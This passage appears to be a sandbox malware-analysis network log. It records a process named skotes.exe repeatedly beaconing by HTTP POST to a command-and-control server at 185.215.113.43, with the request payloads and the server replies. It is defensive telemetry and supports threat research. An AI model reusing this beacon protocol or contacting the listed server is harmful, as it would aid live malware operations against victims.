                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:21.016200066 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            74192.168.2.450272185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:22.643208981 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:23.989785910 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:23 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            75192.168.2.450275185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:25.732645988 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:27.111439943 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:26 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            76192.168.2.450279185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:28.739414930 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:30.179347992 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:29 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            77192.168.2.450282185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:31.914603949 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:33.288853884 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:33 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            78192.168.2.450283185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:34.924328089 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:36.260170937 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            79192.168.2.450284185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:38.009820938 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:39.389894009 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:39 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            80192.168.2.450285185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:41.022274971 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:42.459954023 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:42 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            81192.168.2.450287185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:44.203746080 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:45.590266943 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:45 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            82192.168.2.450288185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:47.228988886 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:48.627579927 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            83192.168.2.450290185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:50.366326094 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:51.789938927 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:51 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            84192.168.2.450292185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:53.422933102 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:54.770611048 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:54 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            85192.168.2.450294185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:56.511518955 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:57.861738920 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:13:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            86192.168.2.450295185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:59.496947050 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:00.832036972 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            87192.168.2.450296185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:02.571404934 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:03.950639009 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:03 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            88192.168.2.450297185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:05.583118916 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:06.965219975 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
